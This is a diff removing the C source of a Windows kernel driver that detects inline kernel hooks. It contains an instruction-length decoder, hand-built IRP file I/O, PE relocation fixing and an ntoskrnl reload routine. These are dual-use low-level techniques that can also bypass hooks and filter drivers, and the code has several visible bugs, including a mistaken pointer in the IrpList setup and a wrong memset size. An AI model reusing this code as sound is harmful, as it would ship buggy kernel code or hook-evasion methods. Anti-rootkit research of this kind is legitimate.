OP_NONE, // 7B
OP_MODRM, // 7C
OP_MODRM, // 7D
OP_MODRM, // 7E
OP_MODRM, // 7F
OP_DATA_PRE66_67 | OP_REL32, // 80
OP_DATA_PRE66_67 | OP_REL32, // 81
OP_DATA_PRE66_67 | OP_REL32, // 82
OP_DATA_PRE66_67 | OP_REL32, // 83
OP_DATA_PRE66_67 | OP_REL32, // 84
OP_DATA_PRE66_67 | OP_REL32, // 85
OP_DATA_PRE66_67 | OP_REL32, // 86
OP_DATA_PRE66_67 | OP_REL32, // 87
OP_DATA_PRE66_67 | OP_REL32, // 88
OP_DATA_PRE66_67 | OP_REL32, // 89
OP_DATA_PRE66_67 | OP_REL32, // 8A
OP_DATA_PRE66_67 | OP_REL32, // 8B
OP_DATA_PRE66_67 | OP_REL32, // 8C
OP_DATA_PRE66_67 | OP_REL32, // 8D
OP_DATA_PRE66_67 | OP_REL32, // 8E
OP_DATA_PRE66_67 | OP_REL32, // 8F
OP_MODRM, // 90
OP_MODRM, // 91
OP_MODRM, // 92
OP_MODRM, // 93
OP_MODRM, // 94
OP_MODRM, // 95
OP_MODRM, // 96
OP_MODRM, // 97
OP_MODRM, // 98
OP_MODRM, // 99
OP_MODRM, // 9A
OP_MODRM, // 9B
OP_MODRM, // 9C
OP_MODRM, // 9D
OP_MODRM, // 9E
OP_MODRM, // 9F
OP_NONE, // A0
OP_NONE, // A1
OP_NONE, // A2
OP_MODRM, // A3
OP_MODRM | OP_DATA_I8, // A4
OP_MODRM, // A5
OP_NONE, // A6
OP_NONE, // A7
OP_NONE, // A8
OP_NONE, // A9
OP_NONE, // AA
OP_MODRM, // AB
OP_MODRM | OP_DATA_I8, // AC
OP_MODRM, // AD
OP_MODRM, // AE
OP_MODRM, // AF
OP_MODRM, // B0
OP_MODRM, // B1
OP_MODRM, // B2
OP_MODRM, // B3
OP_MODRM, // B4
OP_MODRM, // B5
OP_MODRM, // B6
OP_MODRM, // B7
OP_NONE, // B8
OP_NONE, // B9
OP_MODRM | OP_DATA_I8, // BA
OP_MODRM, // BB
OP_MODRM, // BC
OP_MODRM, // BD
OP_MODRM, // BE
OP_MODRM, // BF
OP_MODRM, // C0
OP_MODRM, // C1
OP_MODRM | OP_DATA_I8, // C2
OP_MODRM, // C3
OP_MODRM | OP_DATA_I8, // C4
OP_MODRM | OP_DATA_I8, // C5
OP_MODRM | OP_DATA_I8, // C6
OP_MODRM, // C7
OP_NONE, // C8
OP_NONE, // C9
OP_NONE, // CA
OP_NONE, // CB
OP_NONE, // CC
OP_NONE, // CD
OP_NONE, // CE
OP_NONE, // CF
OP_MODRM, // D0
OP_MODRM, // D1
OP_MODRM, // D2
OP_MODRM, // D3
OP_MODRM, // D4
OP_MODRM, // D5
OP_MODRM, // D6
OP_MODRM, // D7
OP_MODRM, // D8
OP_MODRM, // D9
OP_MODRM, // DA
OP_MODRM, // DB
OP_MODRM, // DC
OP_MODRM, // DD
OP_MODRM, // DE
OP_MODRM, // DF
OP_MODRM, // E0
OP_MODRM, // E1
OP_MODRM, // E2
OP_MODRM, // E3
OP_MODRM, // E4
OP_MODRM, // E5
OP_MODRM, // E6
OP_MODRM, // E7
OP_MODRM, // E8
OP_MODRM, // E9
OP_MODRM, // EA
OP_MODRM, // EB
OP_MODRM, // EC
OP_MODRM, // ED
OP_MODRM, // EE
OP_MODRM, // EF
OP_MODRM, // F0
OP_MODRM, // F1
OP_MODRM, // F2
OP_MODRM, // F3
OP_MODRM, // F4
OP_MODRM, // F5
OP_MODRM, // F6
OP_MODRM, // F7
OP_MODRM, // F8
OP_MODRM, // F9
OP_MODRM, // FA
OP_MODRM, // FB
OP_MODRM, // FC
OP_MODRM, // FD
OP_MODRM, // FE
OP_NONE // FF
};
NTSTATUS
MapFileInUserSpace(WCHAR* wzFilePath,IN HANDLE hProcess OPTIONAL,
OUT PVOID *BaseAddress,
OUT PSIZE_T ViewSize OPTIONAL)
{
NTSTATUS Status = STATUS_INVALID_PARAMETER;
HANDLE hFile = NULL;
HANDLE hSection = NULL;
OBJECT_ATTRIBUTES oa;
SIZE_T MapViewSize = 0;
IO_STATUS_BLOCK Iosb;
UNICODE_STRING uniFilePath;
if (!wzFilePath || !BaseAddress){
return Status;
}
RtlInitUnicodeString(&uniFilePath, wzFilePath);
InitializeObjectAttributes(&oa,
&uniFilePath,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
NULL,
NULL
);
Status = IoCreateFile(&hFile,
GENERIC_READ | SYNCHRONIZE,
&oa,
&Iosb,
NULL,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ,
FILE_OPEN,
FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0,
CreateFileTypeNone,
NULL,
IO_NO_PARAMETER_CHECKING
);
if (!NT_SUCCESS(Status))
{
return Status;
}
oa.ObjectName = NULL;
Status = ZwCreateSection(&hSection,
SECTION_QUERY | SECTION_MAP_READ,
&oa,
NULL,
PAGE_WRITECOPY,
SEC_IMAGE,
hFile
);
ZwClose(hFile);
if (!NT_SUCCESS(Status))
{
return Status;
}
if (!hProcess){
hProcess = NtCurrentProcess();
}
Status = ZwMapViewOfSection(hSection,
hProcess,
BaseAddress,
0,
0,
0,
ViewSize ? ViewSize : &MapViewSize,
ViewUnmap,
0,
PAGE_WRITECOPY
);
ZwClose(hSection);
if (!NT_SUCCESS(Status))
{
return Status;
}
return Status;
}
//通过指令获得函数大小
unsigned long __fastcall GetFunctionCodeSize(void *Proc)
{
ULONG Length;
PUCHAR pOpcode;
ULONG Result = 0;
ULONG CCINT3Count=0;
do
{
Length = SizeOfCode(Proc, &pOpcode);
Result += Length;
if ((Length == 1) && (*pOpcode == 0xCC||*pOpcode==0x90)) CCINT3Count++;
if (CCINT3Count>1 ||
*pOpcode == 0x00)
{
break; //判断退出指令
}
Proc = (PVOID)((ULONG)Proc + Length);
} while (Length);
return Result;
}
unsigned long __fastcall SizeOfCode(void *Code, unsigned char **pOpcode)
{
PUCHAR cPtr;
UCHAR Flags;
BOOLEAN PFX66, PFX67;
BOOLEAN SibPresent;
UCHAR iMod, iRM, iReg;
UCHAR OffsetSize, Add;
UCHAR Opcode;
OffsetSize = 0;
PFX66 = FALSE;
PFX67 = FALSE;
cPtr = (PUCHAR)Code;
while ((*cPtr == 0x2E) || (*cPtr == 0x3E) || (*cPtr == 0x36) ||
(*cPtr == 0x26) || (*cPtr == 0x64) || (*cPtr == 0x65) ||
(*cPtr == 0xF0) || (*cPtr == 0xF2) || (*cPtr == 0xF3) ||
(*cPtr == 0x66) || (*cPtr == 0x67))
{
if (*cPtr == 0x66) PFX66 = TRUE;
if (*cPtr == 0x67) PFX67 = TRUE;
cPtr++;
if (cPtr > (PUCHAR)Code + 16) return 0;
}
Opcode = *cPtr;
if (pOpcode) *pOpcode = cPtr;
if (*cPtr == 0x0F)
{
cPtr++;
Flags = OpcodeFlagsExt[*cPtr];
} else
{
Flags = OpcodeFlags[Opcode];
if (Opcode >= 0xA0 && Opcode <= 0xA3) PFX66 = PFX67;
}
cPtr++;
if (Flags & OP_WORD) cPtr++;
if (Flags & OP_MODRM)
{
iMod = *cPtr >> 6;
iReg = (*cPtr & 0x38) >> 3;
iRM = *cPtr & 7;
cPtr++;
if ((Opcode == 0xF6) && !iReg) Flags |= OP_DATA_I8;
if ((Opcode == 0xF7) && !iReg) Flags |= OP_DATA_PRE66_67;
SibPresent = !PFX67 & (iRM == 4);
switch (iMod)
{
case 0:
if ( PFX67 && (iRM == 6)) OffsetSize = 2;
if (!PFX67 && (iRM == 5)) OffsetSize = 4;
break;
case 1: OffsetSize = 1;
break;
case 2: if (PFX67) OffsetSize = 2; else OffsetSize = 4;
break;
case 3: SibPresent = FALSE;
}
if (SibPresent)
{
if (((*cPtr & 7) == 5) && ( (!iMod) || (iMod == 2) )) OffsetSize = 4;
cPtr++;
}
cPtr = (PUCHAR)(ULONG)cPtr + OffsetSize;
}
if (Flags & OP_DATA_I8) cPtr ++;
if (Flags & OP_DATA_I16) cPtr += 2;
if (Flags & OP_DATA_I32) cPtr += 4;
if (PFX66) Add = 2;
else Add = 4;
if (Flags & OP_DATA_PRE66_67) cPtr += Add;
return (ULONG)cPtr - (ULONG)Code;
}
BOOL IsAddressInSystem(ULONG ulDriverBase,ULONG *ulSysModuleBase,ULONG *ulSize,char *lpszSysModuleImage)
{
NTSTATUS status;
ULONG NeededSize,i;
PMODULES pModuleList;
BOOL bRet = FALSE;
BOOL bInit = FALSE;
if (ZwQuerySystemInformation &&
ExAllocatePool &&
ExFreePool)
{
bInit = TRUE;
}
if (!bInit)
return FALSE;
__try
{
status=ZwQuerySystemInformation(
SystemModuleInformation,
NULL,
0,
&NeededSize);
if (status!=STATUS_INFO_LENGTH_MISMATCH)
{
//KdPrint(("ZwQuerySystemInformation failed:%d",RtlNtStatusToDosError(status)));
return bRet;
}
pModuleList=(PMODULES)ExAllocatePool(NonPagedPool,NeededSize);
if (pModuleList)
{
status=ZwQuerySystemInformation(
SystemModuleInformation,
pModuleList,
NeededSize,
&NeededSize);
if (NT_SUCCESS(status))
{
for (i=0;i<pModuleList->ulCount;i++)
{
if (ulDriverBase > pModuleList->smi[i].Base && ulDriverBase < pModuleList->smi[i].Base + pModuleList->smi[i].Size)
{
bRet = TRUE;
__try
{
*ulSysModuleBase = pModuleList->smi[i].Base;
*ulSize = pModuleList->smi[i].Size;
memset(lpszSysModuleImage,0,sizeof(lpszSysModuleImage));
strcat(lpszSysModuleImage,pModuleList->smi[i].ImageName);
}__except(EXCEPTION_EXECUTE_HANDLER){
}
break;
}
}
}
//else
// KdPrint(("@@ZwQuerySystemInformation failed:%d",RtlNtStatusToDosError(status)));
ExFreePool(pModuleList);
pModuleList = NULL;
}
//else
// KdPrint(("ExAllocatePool failed"));
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
if (pModuleList)
ExFreePool(pModuleList);
return bRet;
}


@ -1,31 +0,0 @@
#include "DriverEntry.h"
#include <ntimage.h>
typedef unsigned long DWORD;
typedef void *HANDLE;
typedef unsigned char BOOL, *PBOOL;
#define SEC_IMAGE 0x01000000
NTSYSAPI
PIMAGE_NT_HEADERS
NTAPI
RtlImageNtHeader(PVOID Base);
NTSTATUS
MapFileInUserSpace(WCHAR* wzFilePath,IN HANDLE hProcess OPTIONAL,
OUT PVOID *BaseAddress,
OUT PSIZE_T ViewSize OPTIONAL);
LONG GetSSDTApiFunctionIndexFromNtdll(char* szFindFunctionName);
BOOL IsAddressInSystem(ULONG ulDriverBase,ULONG *ulSysModuleBase,ULONG *ulSize,char *lpszSysModuleImage);
#define OP_NONE 0x00
#define OP_MODRM 0x01
#define OP_DATA_I8 0x02
#define OP_DATA_I16 0x04
#define OP_DATA_I32 0x08
#define OP_DATA_PRE66_67 0x10
#define OP_WORD 0x20
#define OP_REL32 0x40
unsigned long __fastcall GetFunctionCodeSize(void *Proc);
unsigned long __fastcall SizeOfCode(void *Code, unsigned char **pOpcode);


@ -1,136 +0,0 @@
#include "DriverEntry.h"
#include "KernelHookCheck.h"
#include "Reload.h"
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath)
{
ULONG ImageBase = 0;
NTSTATUS Status = STATUS_SUCCESS;
UNICODE_STRING uniDeviceName;
UNICODE_STRING uniLinkName;
PDEVICE_OBJECT DeviceObject = NULL;
ULONG_PTR i = 0;
RtlInitUnicodeString(&uniDeviceName,DEVICE_NAME);
RtlInitUnicodeString(&uniLinkName,LINK_NAME);
for (i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
{
DriverObject->MajorFunction[i] = DefaultPassThrough;
}
DriverObject->DriverUnload = UnloadDriver;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ControlPassThrough;
//´´½¨É豸¶ÔÏó
Status = IoCreateDevice(DriverObject,0,&uniDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,&DeviceObject);
if (!NT_SUCCESS(Status))
{
return Status;
}
Status = IoCreateSymbolicLink(&uniLinkName,&uniDeviceName);
if (!NT_SUCCESS(Status))
{
IoDeleteDevice(DeviceObject);
return Status;
}
//PINLINEHOOKINFO InlineHookInfo ;
//InlineHookInfo = ExAllocatePool(1,sizeof(INLINEHOOKINFO)+0x1000*sizeof(INLINEHOOKINFO_INFORMATION));
//memset(InlineHookInfo,0,sizeof(INLINEHOOKINFO)+0x1000*sizeof(INLINEHOOKINFO_INFORMATION));
//DriverObject->DriverUnload = UnloadDriver;
ReLoadNtos(DriverObject,ImageBase);
//KernelHookCheck(InlineHookInfo);
return STATUS_SUCCESS;
}
NTSTATUS
ControlPassThrough(PDEVICE_OBJECT DeviceObject,PIRP Irp)
{
NTSTATUS Status = STATUS_SUCCESS;
PIO_STACK_LOCATION IrpSp;
PVOID InputBuffer = NULL;
PVOID OutputBuffer = NULL;
ULONG_PTR InputSize = 0;
ULONG_PTR OutputSize = 0;
ULONG_PTR IoControlCode = 0;
IrpSp = IoGetCurrentIrpStackLocation(Irp);
InputBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
OutputBuffer = Irp->UserBuffer;
InputSize = IrpSp->Parameters.DeviceIoControl.InputBufferLength;
OutputSize = IrpSp->Parameters.DeviceIoControl.OutputBufferLength;
IoControlCode = IrpSp->Parameters.DeviceIoControl.IoControlCode;
switch(IoControlCode)
{
case CTL_CHECKKERNELMODULE:
{
if (!MmIsAddressValid(OutputBuffer))
{
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
Irp->IoStatus.Information = 0;
break;
}
__try
{
ProbeForWrite(OutputBuffer,OutputSize,sizeof(PVOID));
Status = KernelHookCheck((PINLINEHOOKINFO)OutputBuffer);
Irp->IoStatus.Information = 0;
Status = Irp->IoStatus.Status = Status;
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
Irp->IoStatus.Information = 0;
Status = Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
}
Irp->IoStatus.Information = 0;
Status = Irp->IoStatus.Status = Status;
break;
}
default:
{
Irp->IoStatus.Status = STATUS_UNSUCCESSFUL;
Irp->IoStatus.Information = 0;
break;
}
}
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return Status;
}
NTSTATUS
DefaultPassThrough(PDEVICE_OBJECT DeviceObject,PIRP Irp)
{
Irp->IoStatus.Information = 0;
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
VOID UnloadDriver(PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING uniLinkName;
PDEVICE_OBJECT CurrentDeviceObject;
PDEVICE_OBJECT NextDeviceObject;
RtlInitUnicodeString(&uniLinkName,LINK_NAME);
IoDeleteSymbolicLink(&uniLinkName);
if (DriverObject->DeviceObject!=NULL)
{
CurrentDeviceObject = DriverObject->DeviceObject;
while(CurrentDeviceObject!=NULL)
{
NextDeviceObject = CurrentDeviceObject->NextDevice;
IoDeleteDevice(CurrentDeviceObject);
CurrentDeviceObject = NextDeviceObject;
}
}
DbgPrint("UnloadDriver\r\n");
}


@ -1,35 +0,0 @@
#include <ntifs.h>
#include <devioctl.h>
#pragma once
#define DEVICE_NAME L"\\Device\\CheckKernelHookDeviceName"
#define LINK_NAME L"\\DosDevices\\CheckKernelHookLinkName"
#define CTL_CHECKKERNELMODULE \
CTL_CODE(FILE_DEVICE_UNKNOWN,0x830,METHOD_NEITHER,FILE_ANY_ACCESS)
NTSTATUS
DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath);
VOID UnloadDriver(PDRIVER_OBJECT DriverObject);
NTSTATUS
DefaultPassThrough(PDEVICE_OBJECT DeviceObject,PIRP Irp);
NTSTATUS
ControlPassThrough(PDEVICE_OBJECT DeviceObject,PIRP Irp);
typedef struct _INLINEHOOKINFO_INFORMATION { //INLINEHOOKINFO_INFORMATION
ULONG ulHookType;
ULONG ulMemoryFunctionBase; //ԭʼµØÖ·
ULONG ulMemoryHookBase; //HOOK µØÖ·
CHAR lpszFunction[256];
CHAR lpszHookModuleImage[256];
ULONG ulHookModuleBase;
ULONG ulHookModuleSize;
} INLINEHOOKINFO_INFORMATION, *PINLINEHOOKINFO_INFORMATION;
typedef struct _INLINEHOOKINFO { //InlineHook
ULONG ulCount;
INLINEHOOKINFO_INFORMATION InlineHook[1];
} INLINEHOOKINFO, *PINLINEHOOKINFO;


@ -1,306 +0,0 @@
#include "FileSystem.h"
/*创建文件对象相当于自己实现了IoCreateFile FileObject中的IrpList循环指向自身*/
NTSTATUS
IrpCreateFile(
IN PUNICODE_STRING FilePath,
IN ACCESS_MASK DesiredAccess,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PDEVICE_OBJECT DeviceObject,
IN PDEVICE_OBJECT RealDevice,
OUT PFILE_OBJECT *FileObject
)
{
NTSTATUS ntStatus;
HANDLE hFile;
PFILE_OBJECT _FileObject;
UNICODE_STRING UniDeviceNameString;
OBJECT_ATTRIBUTES ObjectAttributes;
IO_STATUS_BLOCK IoStatusBlock;
WCHAR *FileNameBuffer=NULL;
WORD FileObjectSize;
PIRP Irp;
KEVENT kEvent;
PIO_STACK_LOCATION IrpSp;
ACCESS_STATE AccessState;
AUX_ACCESS_DATA AuxData;
IO_SECURITY_CONTEXT SecurityContext;
PLIST_ENTRY IrpList;
InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_CASE_INSENSITIVE, 0, NULL);
//in win7 x86
FileObjectSize=0x80;
//创建文件对象
ntStatus = ObCreateObject(KernelMode,
*IoFileObjectType,
&ObjectAttributes,
KernelMode,
NULL,
FileObjectSize,
0,
0,
&_FileObject);
if(!NT_SUCCESS(ntStatus))
{
return ntStatus;
}
Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE); //在Irp堆栈上申请内存空间 大小为之前查询的DeviceObject->Size
if(Irp == NULL)
{
ObDereferenceObject(_FileObject);
return STATUS_INSUFFICIENT_RESOURCES;
}
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
RtlZeroMemory(_FileObject, FileObjectSize);
_FileObject->Type = IO_TYPE_FILE; //文件对象类型
_FileObject->Size = FileObjectSize; //文件对象大小
_FileObject->DeviceObject = RealDevice; //查询到的卷设备
_FileObject->Flags = FO_SYNCHRONOUS_IO;
FileNameBuffer=ExAllocatePool(NonPagedPool,FilePath->MaximumLength);
if (FileNameBuffer==NULL)
{
ObDereferenceObject(_FileObject);
return STATUS_INSUFFICIENT_RESOURCES;
}
RtlCopyMemory(FileNameBuffer,FilePath->Buffer,FilePath->Length);//文件对象中的文件路径
_FileObject->FileName.Buffer=FileNameBuffer; //
_FileObject->FileName.Length=FilePath->Length;
_FileObject->FileName.MaximumLength=FilePath->MaximumLength;
IrpList=(PLIST_ENTRY)((DWORD)FileObject+0x74); //IrpList 循环指向自身
IrpList->Flink=IrpList;
IrpList->Blink=IrpList;
KeInitializeEvent(&_FileObject->Lock, SynchronizationEvent, FALSE);
KeInitializeEvent(&_FileObject->Event, NotificationEvent, FALSE);
RtlZeroMemory(&AuxData, sizeof(AUX_ACCESS_DATA));
ntStatus = SeCreateAccessState( &AccessState, //访问权限
&AuxData,
DesiredAccess,
IoGetFileObjectGenericMapping());
if (!NT_SUCCESS(ntStatus))
{
IoFreeIrp(Irp);
ObDereferenceObject(_FileObject);
ExFreePool(FileNameBuffer);
return ntStatus;
}
SecurityContext.SecurityQos = NULL;
SecurityContext.AccessState = &AccessState;
SecurityContext.DesiredAccess = DesiredAccess;
SecurityContext.FullCreateOptions = 0;
Irp->MdlAddress = NULL;
Irp->AssociatedIrp.SystemBuffer = NULL;
Irp->Flags = IRP_CREATE_OPERATION|IRP_SYNCHRONOUS_API;
Irp->RequestorMode = KernelMode;
Irp->UserIosb = &IoStatusBlock;
Irp->UserEvent = &kEvent;
Irp->PendingReturned = FALSE;
Irp->Cancel = FALSE;
Irp->CancelRoutine = NULL;
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
Irp->Tail.Overlay.AuxiliaryBuffer = NULL;
Irp->Tail.Overlay.OriginalFileObject = _FileObject;
IrpSp = IoGetNextIrpStackLocation(Irp);
IrpSp->MajorFunction = IRP_MJ_CREATE;
IrpSp->DeviceObject = DeviceObject;
IrpSp->FileObject = _FileObject;
IrpSp->Parameters.Create.SecurityContext = &SecurityContext;
IrpSp->Parameters.Create.Options = (CreateDisposition << 24) | CreateOptions;
IrpSp->Parameters.Create.FileAttributes = (USHORT)FileAttributes;
IrpSp->Parameters.Create.ShareAccess = (USHORT)ShareAccess;
IrpSp->Parameters.Create.EaLength = 0;
IoSetCompletionRoutine(Irp, IoCompletionRoutine, 0, TRUE, TRUE, TRUE);
ntStatus = IoCallDriver(DeviceObject, Irp);
if(ntStatus == STATUS_PENDING)
KeWaitForSingleObject(&kEvent, Executive, KernelMode, TRUE, 0);
ntStatus = IoStatusBlock.Status;
if(!NT_SUCCESS(ntStatus))
{
_FileObject->DeviceObject = NULL;
ObDereferenceObject(_FileObject);
}
else
{//增加引用计数
InterlockedIncrement(&_FileObject->DeviceObject->ReferenceCount);
if (_FileObject->Vpb)
InterlockedIncrement(&_FileObject->Vpb->ReferenceCount);
*FileObject = _FileObject;
}
return ntStatus;
}
NTSTATUS
IoCompletionRoutine(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context)
{
*Irp->UserIosb = Irp->IoStatus;
if (Irp->UserEvent)
KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
if (Irp->MdlAddress)
{
IoFreeMdl(Irp->MdlAddress);
Irp->MdlAddress = NULL;
}
IoFreeIrp(Irp);
return STATUS_MORE_PROCESSING_REQUIRED;
}
//查询irp堆栈信息传入FileObject
NTSTATUS
IrpQueryInformationFile(
IN PFILE_OBJECT FileObject,
IN PDEVICE_OBJECT DeviceObject,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass)
{
NTSTATUS ntStatus;
PIRP Irp;
KEVENT kEvent;
PIO_STACK_LOCATION IrpSp;
IO_STATUS_BLOCK IoStatusBlock;
// if (FileObject->Vpb == 0 || FileObject->Vpb->DeviceObject == NULL)
// return STATUS_UNSUCCESSFUL;
Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE);
if(Irp == NULL)
return STATUS_INSUFFICIENT_RESOURCES;
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
RtlZeroMemory(FileInformation, Length);
Irp->AssociatedIrp.SystemBuffer = FileInformation;
Irp->UserEvent = &kEvent;
Irp->UserIosb = &IoStatusBlock;
Irp->RequestorMode = KernelMode;
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
Irp->Tail.Overlay.OriginalFileObject = FileObject;
IrpSp = IoGetNextIrpStackLocation(Irp);
IrpSp->MajorFunction = IRP_MJ_QUERY_INFORMATION;
IrpSp->DeviceObject = DeviceObject;
IrpSp->FileObject = FileObject;
IrpSp->Parameters.QueryFile.Length = Length;
IrpSp->Parameters.QueryFile.FileInformationClass = FileInformationClass;
IoSetCompletionRoutine(Irp, IoCompletionRoutine, 0, TRUE, TRUE, TRUE);
ntStatus = IoCallDriver(DeviceObject, Irp);
if (ntStatus == STATUS_PENDING)
KeWaitForSingleObject(&kEvent, Executive, KernelMode, TRUE, 0);
return IoStatusBlock.Status;
}
//Irp请求将文件读入缓冲区中
NTSTATUS
IrpReadFile(
IN PFILE_OBJECT FileObject,
IN PDEVICE_OBJECT DeviceObject,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL)
{
NTSTATUS ntStatus;
PIRP Irp;
KEVENT kEvent;
PIO_STACK_LOCATION IrpSp;
//
if(ByteOffset == NULL)
{
if(!(FileObject->Flags & FO_SYNCHRONOUS_IO))
return STATUS_INVALID_PARAMETER;
ByteOffset = &FileObject->CurrentByteOffset;
}
Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE);
if(Irp == NULL) return STATUS_INSUFFICIENT_RESOURCES;
RtlZeroMemory(Buffer, Length);
if(FileObject->DeviceObject->Flags & DO_BUFFERED_IO) //缓冲方式
{
Irp->AssociatedIrp.SystemBuffer = Buffer;
}
else if(FileObject->DeviceObject->Flags & DO_DIRECT_IO) //直接方式
{
Irp->MdlAddress = IoAllocateMdl(Buffer, Length, 0, 0, 0);
if (Irp->MdlAddress == NULL)
{
IoFreeIrp(Irp);
return STATUS_INSUFFICIENT_RESOURCES;
}
MmBuildMdlForNonPagedPool(Irp->MdlAddress);
}
else //其他方式
{
Irp->UserBuffer = Buffer;
}
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
Irp->UserEvent = &kEvent;
Irp->UserIosb = IoStatusBlock;
Irp->RequestorMode = KernelMode;
Irp->Flags = IRP_READ_OPERATION;
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
Irp->Tail.Overlay.OriginalFileObject = FileObject;
IrpSp = IoGetNextIrpStackLocation(Irp);
IrpSp->MajorFunction = IRP_MJ_READ;
IrpSp->MinorFunction = IRP_MN_NORMAL;
IrpSp->DeviceObject = DeviceObject;
IrpSp->FileObject = FileObject;
IrpSp->Parameters.Read.Length = Length;
IrpSp->Parameters.Read.ByteOffset = *ByteOffset;
IoSetCompletionRoutine(Irp, IoCompletionRoutine, 0, TRUE, TRUE, TRUE);
ntStatus = IoCallDriver(DeviceObject, Irp);
if (ntStatus == STATUS_PENDING)
KeWaitForSingleObject(&kEvent, Executive, KernelMode, TRUE, 0);
return IoStatusBlock->Status;
}


@ -1,42 +0,0 @@
#include "Reload.h"
NTSTATUS
IrpCreateFile(
IN PUNICODE_STRING FilePath,
IN ACCESS_MASK DesiredAccess,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PDEVICE_OBJECT DeviceObject,
IN PDEVICE_OBJECT RealDevice,
OUT PFILE_OBJECT *FileObject
);
NTSTATUS
IoCompletionRoutine(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp,
IN PVOID Context);
NTSTATUS
IrpQueryInformationFile(
IN PFILE_OBJECT FileObject,
IN PDEVICE_OBJECT DeviceObject,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
//Irp请求将文件读入缓冲区中
NTSTATUS
IrpReadFile(
IN PFILE_OBJECT FileObject,
IN PDEVICE_OBJECT DeviceObject,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL);


@ -1,461 +0,0 @@
#include "FixRelocation.h"
/*
*/
BOOLEAN
FixBaseRelocTable (
PVOID NewImageBase,
DWORD ExistImageBase
)
{
LONGLONG Diff;
ULONG TotalCountBytes = 0;
ULONG_PTR VA;
ULONGLONG OriginalImageBase;
ULONG SizeOfBlock;
PUCHAR FixupVA;
USHORT Offset;
PUSHORT NextOffset = NULL;
PIMAGE_NT_HEADERS NtHeaders;
PIMAGE_BASE_RELOCATION NextBlock;
NtHeaders = RtlImageNtHeader( NewImageBase );
if (NtHeaders == NULL)
{
return FALSE;
}
switch (NtHeaders->OptionalHeader.Magic) {
case IMAGE_NT_OPTIONAL_HDR32_MAGIC:
OriginalImageBase =
((PIMAGE_NT_HEADERS32)NtHeaders)->OptionalHeader.ImageBase;
break;
case IMAGE_NT_OPTIONAL_HDR64_MAGIC:
OriginalImageBase =
((PIMAGE_NT_HEADERS64)NtHeaders)->OptionalHeader.ImageBase;
break;
default:
return FALSE;
}
//
// Locate the relocation section.
//
NextBlock = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(
NewImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &TotalCountBytes);
//
// It is possible for a file to have no relocations, but the relocations
// must not have been stripped.
//
if (!NextBlock || !TotalCountBytes)
{
if (NtHeaders->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED)
{
DbgPrint("Image can't be relocated, no fixup information.\n");
return FALSE;
}
else
{
return TRUE;
}
}
//
// If the image has a relocation table, then apply the specified fixup
// information to the image.
//
Diff = (ULONG_PTR)ExistImageBase - OriginalImageBase;
while (TotalCountBytes)
{
SizeOfBlock = NextBlock->SizeOfBlock;
TotalCountBytes -= SizeOfBlock;
SizeOfBlock -= sizeof(IMAGE_BASE_RELOCATION);
SizeOfBlock /= sizeof(USHORT);
NextOffset = (PUSHORT)((PCHAR)NextBlock + sizeof(IMAGE_BASE_RELOCATION));
VA = (ULONG_PTR)NewImageBase + NextBlock->VirtualAddress;
if ( !(NextBlock = LdrProcessRelocationBlockLongLong( VA,
SizeOfBlock,
NextOffset,
Diff)) )
{
DbgPrint("%s: Unknown base relocation type\n");
return FALSE;
}
}
return TRUE;
}
/*修复重定位表*/
PIMAGE_BASE_RELOCATION
LdrProcessRelocationBlockLongLong(
IN ULONG_PTR VA,
IN ULONG SizeOfBlock,
IN PUSHORT NextOffset,
IN LONGLONG Diff
)
{
PUCHAR FixupVA;
USHORT Offset;
LONG Temp;
ULONG Temp32;
ULONGLONG Value64;
LONGLONG Temp64;
while (SizeOfBlock--) {
Offset = *NextOffset & (USHORT)0xfff;
FixupVA = (PUCHAR)(VA + Offset);
//
// Apply the fixups.
//
switch ((*NextOffset) >> 12) {
case IMAGE_REL_BASED_HIGHLOW :
//
// HighLow - (32-bits) relocate the high and low half
// of an address.
//
*(LONG UNALIGNED *)FixupVA += (ULONG) Diff;
break;
case IMAGE_REL_BASED_HIGH :
//
// High - (16-bits) relocate the high half of an address.
//
